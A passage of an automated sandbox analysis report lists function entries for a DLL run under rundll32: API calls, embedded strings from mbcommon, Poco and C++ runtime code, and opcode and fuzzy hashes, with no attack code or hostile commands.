      • String ID: Could not load '%s' function ptr from DLL because DLL is not loaded$Could not load '%s' function ptr from DLL, %s$D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\DynamicLibrary.cpp$mb::common::system::DynamicLibrary::GetFunctionAddress
      • API String ID: 1230731272-560569770
      • Opcode ID: 1fef4f74c05ee2d78553d6c1d76f499fa895c5e38613afa3b0117b4ca4a0fd19
      • Instruction ID: 2d62702eddbb558de309e16dbec1e386c5a102024c7951b4589988eaaaf8c99c
      • Opcode Fuzzy Hash: 1fef4f74c05ee2d78553d6c1d76f499fa895c5e38613afa3b0117b4ca4a0fd19
      • Instruction Fuzzy Hash: 24A17F72B11B4895EB91DB69D4543ED33A1FB487E8F40D612EAAC07A99DF39C689C300
      APIs
      Strings
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID: f$f$p$p$f
      • API String ID: 3215553584-1325933183
      • Opcode ID: 60cc5941032d4e73c70e6236033a5792d810f6054c6545baca1d3859597e7a10
      • Instruction ID: 1da7f3d17b81cf6398a85a4ad5d22cd62852d82a194764ff71d46eb388f96ab5
      • Opcode Fuzzy Hash: 60cc5941032d4e73c70e6236033a5792d810f6054c6545baca1d3859597e7a10
      • Instruction Fuzzy Hash: 6E12F67270494A86FBAB9B14F15C3F97261F348770F84D015E6C547AE8DF3ACA898B50
      APIs
      Strings
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy
      • String ID: ios_base::failbit set
      • API String ID: 3630682930-3924258884
      • Opcode ID: c009e20e0163d43c03b6c8245f5196e59524e9394bb8ed14474b75b32bd38d0c
      • Instruction ID: b92572973f6f056b71fb1a3a17d0bce48dbe57363f560e11b7e88f697490d759
      • Opcode Fuzzy Hash: c009e20e0163d43c03b6c8245f5196e59524e9394bb8ed14474b75b32bd38d0c
      • Instruction Fuzzy Hash: 0EC1D032615B8881EB92DB25E4453ED7361E78DBE4F10D221EAAC067E6DF78C699C300
      APIs
      Strings
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: AUX$COM$CON$LPT$NUL$PRN$\\.\
      • API String ID: 3668304517-431953350
      • Opcode ID: 50c9fd94dec52d2418c9c4644ecb9a1058296973547e3872325ecbe4daeaa39f
      • Instruction ID: 38d949412858d7621a5721e595f2d056ef18627934969283c6c0347f1df82c58
      • Opcode Fuzzy Hash: 50c9fd94dec52d2418c9c4644ecb9a1058296973547e3872325ecbe4daeaa39f
      • Instruction Fuzzy Hash: 747194B3714A88D1EFA28B25D0153E9B3A1F369BD4F94C112FA8D47694DE69CF4AC700
      APIs
      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000018000300F), ref: 00000001800085B9
        • Part of subcall function 00000001800150D0: OpenProcess.KERNEL32 ref: 000000018001510C
        • Part of subcall function 00000001800150D0: OpenProcess.KERNEL32 ref: 000000018001512C
        • Part of subcall function 00000001800150D0: GetLastError.KERNEL32 ref: 000000018001513E
        • Part of subcall function 00000001800150D0: CloseHandle.KERNEL32 ref: 000000018001542C
        • Part of subcall function 0000000180015470: GetModuleHandleW.KERNEL32 ref: 00000001800154DA
        • Part of subcall function 0000000180015470: GetProcAddress.KERNEL32 ref: 00000001800154EA
      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008760
      Strings
      Similarity
      • API ID: Process$HandleOpen$AddressCloseCurrentErrorLastModuleProc_invalid_parameter_noinfo_noreturn
      • String ID: Crypto$D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\Crypto.cpp$Process did not verify - %x - %u$Process in-memory image did not verify - %u - %s$VerifyProcess failed to get process path - %u$mb::common::crypto::VerifyProcessEx
      • API String ID: 3975211933-3964609968
      • Opcode ID: 8d988610b517b66eb06978deedab6b2115b64aa6f0835ac1fc9e9ed062743cc5
      • Instruction ID: 002036f762da34ff8db0a22a3868040925bfe3c3438f5634a40e792c62256954
      • Opcode Fuzzy Hash: 8d988610b517b66eb06978deedab6b2115b64aa6f0835ac1fc9e9ed062743cc5
      • Instruction Fuzzy Hash: F1511F76608B8982EB51CB54F49439AB7A1F78C7E4F508116FACD47699DF78C648CB00
      APIs
        • Part of subcall function 0000000180106750: AcquireSRWLockExclusive.KERNEL32(?,?,?,00000001800244B1,?,?,?,0000000180002C19), ref: 0000000180106760
      • GetModuleHandleW.KERNEL32 ref: 00000001800154DA
      • GetProcAddress.KERNEL32 ref: 00000001800154EA
        • Part of subcall function 00000001801066E4: AcquireSRWLockExclusive.KERNEL32(?,?,?,00000001800244DB,?,?,?,0000000180002C19), ref: 00000001801066F4
        • Part of subcall function 00000001801066E4: ReleaseSRWLockExclusive.KERNEL32(?,?,?,00000001800244DB,?,?,?,0000000180002C19), ref: 0000000180106734
      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800156EC
      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800156F2
      Strings
      Similarity
      • API ID: ExclusiveLock$Acquire_invalid_parameter_noinfo_noreturn$AddressHandleModuleProcRelease
      • String ID: NtQuerySystemInformation$ntdll.dll
      • API String ID: 2734340950-3774135904
      • Opcode ID: 7b008e91cb76bd202fba05ef95906712dc144a287f15d9e36831c7d287c40dcb
      • Instruction ID: a10bd6991d194b5c177b67f4aac7a101da8466237153ef4756e3699e838ac3bb
      • Opcode Fuzzy Hash: 7b008e91cb76bd202fba05ef95906712dc144a287f15d9e36831c7d287c40dcb
      • Instruction Fuzzy Hash: 0561A272711F48D9FB52DB75D8483DD33A2AB4C7E8F50C225AA980B6E9DE74C689C340
      APIs
      • FreeLibrary.KERNEL32(?,?,0000000180130618,?,?,?,?,00000001801288C5,?,?,?,?,000000018010594C,?,?,00000000), ref: 000000018012FFA0
      • GetProcAddress.KERNEL32(?,?,0000000180130618,?,?,?,?,00000001801288C5,?,?,?,?,000000018010594C,?,?,00000000), ref: 000000018012FFAC
      Strings
      Similarity
      • API ID: AddressFreeLibraryProc
      • String ID: api-ms-$ext-ms-
      • API String ID: 3013587201-537541572
      • Opcode ID: 7198340eb933fcddaf87aa1fa73f54ae1c1aa156182e913faa117afdfadb1161
      • Instruction ID: 03516c87bbbf3b13ccd75a7c17be7f6a40f8331a520ceada4aaaef6bbc0e6d97
      • Opcode Fuzzy Hash: 7198340eb933fcddaf87aa1fa73f54ae1c1aa156182e913faa117afdfadb1161
      • Instruction Fuzzy Hash: 4641D472321B1985FBA7DB1699087E62392B74DBF0F49C129ED0987799EE38C60D8700
      APIs
      Strings
      Similarity
      • API ID: Lockitstd::_$Concurrency::cancel_current_taskLockit::_Lockit::~_
      • String ID: bad locale name$false$true
      • API String ID: 2115809835-1062449267
      • Opcode ID: 3eb764857571638ea639fc852bc58915e2b5e0f2f3e3f844ef9de042b42a80e1
      • Instruction ID: 0a47188049085c96de077126a6a7bc261e24a0e280c1158c0fa2977b959a987f
      • Opcode Fuzzy Hash: 3eb764857571638ea639fc852bc58915e2b5e0f2f3e3f844ef9de042b42a80e1
      • Instruction Fuzzy Hash: 0E819032205BC886EB56CF30E8843DE77A4FB98798F549115FA8817B69DF38C699C740
      APIs
      Strings
      Similarity
      • API ID: EventReset$Wait$MultipleMutexObjectObjectsReleaseSinglestd::bad_exception::bad_exception
      • String ID: cannot lock reader/writer lock
      • API String ID: 2438275785-3465051855
      • Opcode ID: da3257100d4325e52a0612eeb12e31ec67f956241cd1235f159f0b4ad8865caf
      • Instruction ID: 928cd7e5a2a3c19c91096689682fe9f00081523089b4839ba0cf6de9e0aa202b
      • Opcode Fuzzy Hash: da3257100d4325e52a0612eeb12e31ec67f956241cd1235f159f0b4ad8865caf
      • Instruction Fuzzy Hash: D0115172220A0D92EB92DF20E8947D97371F798F98F808021EA5D436AADF38C64DC740
      APIs
      Similarity
      • API ID: ByteCharMultiStringWide
      • String ID:
      • API String ID: 2829165498-0
      • Opcode ID: 2059b5de93772b6589164b545c0d660cdabe6dbd7163e6b83504d15557ee1706
      • Instruction ID: a9fb6d0c5e32a15882cdf7d6f766ac3614fca2e62d703d427023a8a9716f6c71
      • Opcode Fuzzy Hash: 2059b5de93772b6589164b545c0d660cdabe6dbd7163e6b83504d15557ee1706
      • Instruction Fuzzy Hash: B681C572300B4886EBA1CF11E4583A977E1F788BF8F548215EA9957BE8DF7CC6098700
      APIs
      Similarity
      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
      • String ID:
      • API String ID: 2081738530-0
      • Opcode ID: e74defd6e44153776dcf575d9a0119c280fa8a440b153087fd78519c6dbb8ca4
      • Instruction ID: a17a6a9c76327ac1197ff84e204077398036305ebdd83819081fcd8ba0eb649b
      • Opcode Fuzzy Hash: e74defd6e44153776dcf575d9a0119c280fa8a440b153087fd78519c6dbb8ca4
      • Instruction Fuzzy Hash: 7F315432305B4885EBA6DF15E8443DA73A2F79DBE4F488221EA8D577A5DF38C649C700
      APIs
      Similarity
      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
      • String ID:
      • API String ID: 2081738530-0
      • Opcode ID: 2742c7814c3d9141867964d29c3211bf07c947db12c32302beb503fc19865477
      • Instruction ID: c59888543ef58e5a734107e20c96db3b83024bccbeb0ae9d9f276c0960d4cf20
      • Opcode Fuzzy Hash: 2742c7814c3d9141867964d29c3211bf07c947db12c32302beb503fc19865477
      • Instruction Fuzzy Hash: 7E317E32200B4884EBA6DB15E4443DA73A2F74DBE4F58C621EA9D173A6DE78C649C300
      APIs
      • GetLastError.KERNEL32(?,?,8000000000000000,0000000180124C05,?,?,?,?,000000018012C6C4), ref: 000000018012AC37
      • FlsSetValue.KERNEL32(?,?,8000000000000000,0000000180124C05,?,?,?,?,000000018012C6C4), ref: 000000018012AC6D
      • FlsSetValue.KERNEL32(?,?,8000000000000000,0000000180124C05,?,?,?,?,000000018012C6C4), ref: 000000018012AC9A
      • FlsSetValue.KERNEL32(?,?,8000000000000000,0000000180124C05,?,?,?,?,000000018012C6C4), ref: 000000018012ACAB
      • FlsSetValue.KERNEL32(?,?,8000000000000000,0000000180124C05,?,?,?,?,000000018012C6C4), ref: 000000018012ACBC
      • SetLastError.KERNEL32(?,?,8000000000000000,0000000180124C05,?,?,?,?,000000018012C6C4), ref: 000000018012ACD7
      Similarity
      • API ID: Value$ErrorLast
      • String ID:
      • API String ID: 2506987500-0
      • Opcode ID: 36757262a35ff0a418cde6abc8dd7c87a5e57a68b04b148afcbd8265ab752082
      • Instruction ID: d213d25cf1d276d5630f7abeba5ae812c027ebe3f7d0956fbb059bd98219fbf6
      • Opcode Fuzzy Hash: 36757262a35ff0a418cde6abc8dd7c87a5e57a68b04b148afcbd8265ab752082
      • Instruction Fuzzy Hash: 66116D7020164C47FADBE7A1699D3EA63825B8CBF0F94C724A937477D6EE28C6194300
      APIs
      Strings
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
      • String ID: string too long
      • API String ID: 3936042273-2556327735
      • Opcode ID: a2f15db28bc96a0d3fe94e1749557d9fb73bed376aeb445b49e40e8c97343fc8
      • Instruction ID: f6307991c770a111e731ac363c3614bd6e4c1c5c81b05f7b3cc911774e9de69b
      • Opcode Fuzzy Hash: a2f15db28bc96a0d3fe94e1749557d9fb73bed376aeb445b49e40e8c97343fc8
      • Instruction Fuzzy Hash: 1721C6B1711A4881EE8AE725D4493ED32929B4CBF5F90CA11E66D077D1DE29C6998300
      APIs
      Strings
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: EventMultipleMutexObjectsReleaseResetWaitstd::bad_exception::bad_exception
      • String ID: cannot lock reader/writer lock
      • API String ID: 2739960895-3465051855
      • Opcode ID: 1af4f7dfb9ebc9c0bdea181eb432d002f952579437f4c92c9cbce27466e656b0
      • Instruction ID: 10f920412d7c47fb8d58a7fe2a1a522ce3c77fd6108f22b1ef94d16f7f12780f
      • Opcode Fuzzy Hash: 1af4f7dfb9ebc9c0bdea181eb432d002f952579437f4c92c9cbce27466e656b0
      • Instruction Fuzzy Hash: 64015272324E4D92EBA1DF14E8947D96361F798BA8F908111EA9D436A9DF68C74CC700
      APIs
      Strings
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Event$ObjectSingleWaitstd::bad_exception::bad_exception
      • String ID: cannot unlock reader/writer lock
      • API String ID: 3180635873-371100150
      • Opcode ID: 8c42cc83d1dc5662322d6a4df776fd4029acb352a784f7d713df5e6f3d36fb27
      • Instruction ID: d7938ff99a365b3d87c448e0d198d97c5280b858174ccc0be31b4ddeb6fe8eec
      • Opcode Fuzzy Hash: 8c42cc83d1dc5662322d6a4df776fd4029acb352a784f7d713df5e6f3d36fb27
      • Instruction Fuzzy Hash: 53017172210A0D92EB92DF34D8943D92361F798BA8F508221A69D471B6DF38CB4DC740
      APIs
      Strings
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
      • API String ID: 1646373207-4044117955
      • Opcode ID: 89e552c4e88594f4528d331deacfdfd5774308e9a2a5faa3174df9f7c776611f
      • Instruction ID: 82d929f7dce70f2d4cc30c438cf3b185241df2672d86fdfca1400b9e468a4217
      • Opcode Fuzzy Hash: 89e552c4e88594f4528d331deacfdfd5774308e9a2a5faa3174df9f7c776611f
      • Instruction Fuzzy Hash: A8D0E274610E09D0EB868B11E8983D86322AB1DBA0F858021891906231AE78C78EC300
      APIs
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _set_statfp
      • String ID:
      • API String ID: 1156100317-0
      • Opcode ID: 4c0fcecc25532a6bca2445fc70d44c848c979418bf5aad8969812cd20ace7fdb
      • Instruction ID: bf21a2e4e3eed7cd890d8279d15e8f828ffcafd917cef997570f9cfaa1a5c951
      • Opcode Fuzzy Hash: 4c0fcecc25532a6bca2445fc70d44c848c979418bf5aad8969812cd20ace7fdb
      • Instruction Fuzzy Hash: 7481F732204A8C89F6F78B74A4583EAA790AB5D7B4F06C711FE56265A4DF3CC7898700
      APIs
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _set_statfp
      • String ID:
      • API String ID: 1156100317-0
      • Opcode ID: 875aa39bdbfff885f1eaa1d50411e9c2b76fb06a4bc3d51bafdc59c774b2410f
      • Instruction ID: 12bd030bb14459057d4e795199f88650652e390fad2f0e14d604fef560c65bce
      • Opcode Fuzzy Hash: 875aa39bdbfff885f1eaa1d50411e9c2b76fb06a4bc3d51bafdc59c774b2410f
      • Instruction Fuzzy Hash: 6B11A932A14A0D09F7E61168F84F3E653426B5C370F1BC63CEA764A2DA8F1CCB494318
      APIs
      • FlsGetValue.KERNEL32(?,?,?,0000000180115D4F,?,?,00000000,0000000180115FEA,?,?,?,?,8000000000000000,0000000180115F76), ref: 000000018012AD0F
      • FlsSetValue.KERNEL32(?,?,?,0000000180115D4F,?,?,00000000,0000000180115FEA,?,?,?,?,8000000000000000,0000000180115F76), ref: 000000018012AD2E
      • FlsSetValue.KERNEL32(?,?,?,0000000180115D4F,?,?,00000000,0000000180115FEA,?,?,?,?,8000000000000000,0000000180115F76), ref: 000000018012AD56
      • FlsSetValue.KERNEL32(?,?,?,0000000180115D4F,?,?,00000000,0000000180115FEA,?,?,?,?,8000000000000000,0000000180115F76), ref: 000000018012AD67
      • FlsSetValue.KERNEL32(?,?,?,0000000180115D4F,?,?,00000000,0000000180115FEA,?,?,?,?,8000000000000000,0000000180115F76), ref: 000000018012AD78
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Value
      • String ID:
      • API String ID: 3702945584-0
      • Opcode ID: 81d1270b762b0c3052a7883345d0481c278e379d47ca9de34ba82a4d0e7734ec
      • Instruction ID: 5395f719372555535939784c7be95c2335b10427f043919dc8125f3aba7b9476
      • Opcode Fuzzy Hash: 81d1270b762b0c3052a7883345d0481c278e379d47ca9de34ba82a4d0e7734ec
      • Instruction Fuzzy Hash: D41166B070060C42FADBD7A5699D3E963825B4C7F1F84C724A93A46BD6ED28D6094300
      APIs
      Strings
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: NULL$UNKNOWN
      • API String ID: 3668304517-1702702805
      • Opcode ID: 5a53d26a1a5bbb904569064fe1efa1fe02fcc7a8f52a4aaa2ae3858da6874c8a
      • Instruction ID: 72e003983931457cbed81e393341778105e41611213a4bd58213932db65429f8
      • Opcode Fuzzy Hash: 5a53d26a1a5bbb904569064fe1efa1fe02fcc7a8f52a4aaa2ae3858da6874c8a
      • Instruction Fuzzy Hash: 52E1DBB2700A4886EB45DF65D4843DE73A2F389BD8F408112EE5C47BA9DF78C699C780
      APIs
      Strings
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: CountLocalTickTime_invalid_parameter_noinfo_noreturn
      • String ID: NULL
      • API String ID: 2617042107-324932091
      • Opcode ID: a28921490d57aeb845739df719c729e3a787046ccc08f6e18cbdcb93d3b3afc5
      • Instruction ID: 0302fca370165518a614849ae6957893dbb9724cfd82eb150d4bd385d77409e6
      • Opcode Fuzzy Hash: a28921490d57aeb845739df719c729e3a787046ccc08f6e18cbdcb93d3b3afc5
      • Instruction Fuzzy Hash: DF819272618B8885D751DF66A4443AAB7A1F7C9BE0F508215FED843B99DF7CC189CB00
      APIs
      Strings
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: \\?\
      • API String ID: 3668304517-4282027825
      • Opcode ID: 7474011f91476d4f1f395424f9e6538de8aded65c8bbec649ce6fef0c6d9fbb7
      • Instruction ID: e3da2e98e83031a46e163e82dd4a2df939d91234efc63fa8098c881fd51fdd5e
      • Opcode Fuzzy Hash: 7474011f91476d4f1f395424f9e6538de8aded65c8bbec649ce6fef0c6d9fbb7
      • Instruction Fuzzy Hash: 5571B172F10B8895FB42DBB4D4053EC2362A7997E8F40D712AE5C26ADADE74D299C340
      APIs
      Strings
      • mb::common::system::DynamicLibrary::GetFunctionAddress, xrefs: 0000000180008016
      • D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\DynamicLibrary.cpp, xrefs: 000000018000800F
      • Could not load '%s' function ptr from DLL, %s, xrefs: 0000000180007FF0
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$AddressProc
      • String ID: Could not load '%s' function ptr from DLL, %s$D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\DynamicLibrary.cpp$mb::common::system::DynamicLibrary::GetFunctionAddress
      • API String ID: 1230731272-4139386056
      • Opcode ID: b34e889fd022bbeee9e1fa76f47b9e9ad2bafbb3a5cc8b6230be30ab7d054667
      • Instruction ID: 8f446e428537b61bb469f5dc6ffa7d697688d599811667f0c1dc1d600c907061
      • Opcode Fuzzy Hash: b34e889fd022bbeee9e1fa76f47b9e9ad2bafbb3a5cc8b6230be30ab7d054667
      • Instruction Fuzzy Hash: EF617C72B11B8495EB91CB69D4543ED33A1FB487E8F40D611EEAC17AA9DF39C689C300
      APIs
      Strings
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Lockitstd::_$GetctypeLockit::_Lockit::~_
      • String ID: bad locale name
      • API String ID: 4031452535-1405518554
      • Opcode ID: 478bf454d2c5dc8698a69319a5ae243412ac62571b83a77d00aeeb4afc9df37b
      • Instruction ID: e46e7240f11e8861bd97b3fc796cf63e4a9d5239baa8a6bc634fefc30cdde4d8
      • Opcode Fuzzy Hash: 478bf454d2c5dc8698a69319a5ae243412ac62571b83a77d00aeeb4afc9df37b
      • Instruction Fuzzy Hash: A751AD32705B888AFB92DB70D4903ED33B0FB48798F448125EE8927A56DF34C25AD740
      APIs
      Strings
      • D:\Jenkins\workspace\N_Poco-VS2022\poco-1.12.4\Foundation\src\UUID.cpp, xrefs: 00000001800053D3
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
      • String ID: D:\Jenkins\workspace\N_Poco-VS2022\poco-1.12.4\Foundation\src\UUID.cpp
      • API String ID: 3936042273-2945662684
      • Opcode ID: 5e185dececa9ffba5f991f3b2136fd39395a2c4a35c5d19d9c8cad2849e43297
      • Instruction ID: 184b889ee7b8437c24e17c986fc0991f08bc74d679e07afdf23ead7db32f2553
      • Opcode Fuzzy Hash: 5e185dececa9ffba5f991f3b2136fd39395a2c4a35c5d19d9c8cad2849e43297
      • Instruction Fuzzy Hash: 6B41F77270174C85FA56DB25A4043ED3291970DBEAF648720EEAD077D2EF79C6D98340
      APIs
      Strings
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: EventObjectResetSingleWaitstd::bad_exception::bad_exception
      • String ID: cannot lock reader/writer lock
      • API String ID: 2155282129-3465051855
      • Opcode ID: 04afe7aeb50be484474440e41a6ba2e6a53ef334bd5f62e7df4d7ad6249427b5
      • Instruction ID: 957882a243363fd6d7becb3249b184c5a90b221fcb011ca086b4eca50b7a50e4
      • Opcode Fuzzy Hash: 04afe7aeb50be484474440e41a6ba2e6a53ef334bd5f62e7df4d7ad6249427b5
      • Instruction Fuzzy Hash: F001447221094DD1EB92DF24E8947D96372F798B98F508111EA5D475B6DE2CCB4DC700
      APIs
      Strings
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: EventObjectSingleWaitstd::bad_exception::bad_exception
      • String ID: cannot lock reader/writer lock
      • API String ID: 2550396280-3465051855
      • Opcode ID: 8668b01ef895fa9c907ac601cdbf758bfc3ef4e0a08812f0761a6ab266ec204c
      • Instruction ID: 81ac2efecde3d820960b4444860f485e3e67599f3676025276b3880028ebf80e
      • Opcode Fuzzy Hash: 8668b01ef895fa9c907ac601cdbf758bfc3ef4e0a08812f0761a6ab266ec204c
      • Instruction Fuzzy Hash: BE01867221494D92EFA2DF34E8543D92361F79CBA8F508211AA5D461E5DF78CB4DC700
      APIs
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 3668304517-0
      • Opcode ID: b2c45699f4e96eed30ae793f53bffa8189e6b1516e1df3511c241bc08676e161
      • Instruction ID: d3ca66fb5dc8ef5d60f2ba4e6a04f48cd7171f11350cc8f66b5cc806ebf3fdaf
      • Opcode Fuzzy Hash: b2c45699f4e96eed30ae793f53bffa8189e6b1516e1df3511c241bc08676e161
      • Instruction Fuzzy Hash: B7B181B2311A8881EF85CF25D4983ED3366F749FD8F548122EA9D0BB99DF79C5998300
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: ActionsShim
      • API String ID: 3668304517-3444104735
      • Opcode ID: 15ef7686102915452db76d5188d50b71f09ce339104a48d757c6c0837b23a0f3
      • Instruction ID: 3e157ecc3d4080ae9d86b064c881996505c3036df48e40823568e20f45b0052f
      • Opcode Fuzzy Hash: 15ef7686102915452db76d5188d50b71f09ce339104a48d757c6c0837b23a0f3
      • Instruction Fuzzy Hash: DE916B32210B8482EB85DF25E48439D73A5F789B94F54C125EB9D07BA9DF38C599D340
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: ActionsShim$cannot create reader/writer lock
      • API String ID: 0-3821395182
      • Opcode ID: 90af42576f8b9e88bc76497404a4c90f79e3ff7b36981b2cb9481b3ad311e525
      • Instruction ID: 5362194995dedf51be220ecf943bbbeff3c2103531289cc3d0a6ebdf7eb1c8fc
      • Opcode Fuzzy Hash: 90af42576f8b9e88bc76497404a4c90f79e3ff7b36981b2cb9481b3ad311e525
      • Instruction Fuzzy Hash: 23414B32210B8881E795DB26E48439E7365F789BD4F54C125EE9D07BA5DF39CA99C300
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Lockitstd::_$Lockit::_Lockit::~_
      • String ID: bad locale name
      • API String ID: 593203224-1405518554
      • Opcode ID: 0a75c369d1590a7b9cdad47024db5ca3613b4c240e337ec2adf62f0efd43d4b2
      • Instruction ID: 3bfe555c786686dd313cd11618e8808d576bb14b31471c45e6f1dc0ab111c233
      • Opcode Fuzzy Hash: 0a75c369d1590a7b9cdad47024db5ca3613b4c240e337ec2adf62f0efd43d4b2
      • Instruction Fuzzy Hash: 8F413D32702B88C9FB96DFB0D4947ED33A4EB48758F448425EE4927A5ACF34C62AD344
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
